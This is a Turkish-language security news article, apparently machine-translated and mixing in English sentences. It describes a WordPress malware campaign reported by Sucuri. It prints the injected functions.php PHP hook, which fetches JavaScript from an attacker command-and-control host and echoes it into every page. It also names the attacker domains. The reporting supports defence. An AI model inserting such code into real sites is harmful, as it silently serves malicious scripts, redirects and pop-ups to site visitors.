WordPress web siteleri, trafikten para kazanmak ve ziyaretçi güvenliğini tehlikeye atmak isteyen tehdit aktörleri için ana hedef haline gelmiştir.
Son aylarda, istenmeyen üçüncü taraf komut dosyalarına hizmet vermek için tema dosyalarında sessiz PHP kod enjeksiyonlarından yararlanarak yeni bir kötü niyetli kampanyası ortaya çıktı.
Saldırı, meşru site operasyonlarıyla sorunsuz bir şekilde karışıyor, ziyaretçileri yeniden yönlendiren, pop-up’ları gösteren ve şüphe yaratmadan güvenlik araçlarından kaçınan gizlenmiş JavaScript sunuyor.
Başlangıçta bir site sahibi tarafından, açıklanamayan komut dosyası yüklerini fark eden saldırı, aktif temaya eklenen küçük bir PHP kodu bloğundan kaynaklandı functions.php dosya.
Bu enjeksiyon görünür sayfa içeriğini değiştirmedi, bunun yerine her istek üzerine perde arkasında yürüttü.
Sucuri analistleri, saldırgan kontrollü alanlara anormal JavaScript çağrıları ve birden fazla güvenlik satıcısı tarafından blok listesini tespit ettikten sonra kampanyayı belirledi.
Saldırı öncelikle zayıf dosya izinlerinden ve modası geçmiş temalardan yararlanıyor. Yazma erişimi elde ederek-genellikle tehlikeye atılan kimlik bilgileri veya savunmasız eklentiler yoluyla-Hackers, bir komut ve kontrol sunucusuyla iletişime geçen görünüşte iyi huylu bir işlev ekler.
Bir kez çağrıldığında wp_head kanca, işlev dinamik bir JavaScript yükü getirir ve onu sayfanın içine yankılar section, ensuring execution before the rest of the page loads.
Sucuri researchers noted that the injected function establishes a POST connection to a remote endpoint at hxxps://brazilc[.]com/ads.php, retrieves the malicious script, and embeds it directly into the HTML document.
The payload performs two main actions: loading a traffic-distribution script from porsasystem.com/6m9x.js ve Cloudflare’nin meydan okuma platformunu taklit eden gizli bir 1 × 1 piksel iframe enjekte etmek.
Bu teknikler, kötü niyetli etkinlikleri meşru CDN operasyonları olarak gizleyerek zorla yönlendirmeleri, açılır pencereleri ve güvenlik tarayıcılarının kaçınmasını sağlar.
Enfeksiyon mekanizması
Enfeksiyon mekanizması, enjekte edilen aşağıdaki PHP fonksiyonuna bağlı functions.php:-
// Injected PHP function in functions.php
function ti_custom_javascript() {
$response = wp_remote_post(
'https://brazilc.com/ads.php',
array('timeout' => 15, 'body' => array('url' => home_url()))
);
if (!is_wp_error($response)) {
echo wp_remote_retrieve_body($response);
}
}
add_action('wp_head', 'ti_custom_javascript');Her sayfa yükü üzerine, bu işlev sessizce yürütülür, C&C sunucusuyla iletişime geçer ve döndürülen JavaScript yükünü sayfa üstbilgisine yazdırır.
.webp)
Saldırganın komut dosyası, eşzamansız olarak daha fazla kötü amaçlı kod yükler ve özelliklerden yararlanır data-cfasync="false" Ve async Cloudflare roket yükleyicisini atlamak için.
Gizli bir IFrame içine yerleştirilerek, kötü amaçlı yazılım algılamadan kaçınır ve enjekte edilen kod kaldırılana kadar sürekli olarak ikamet eder.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
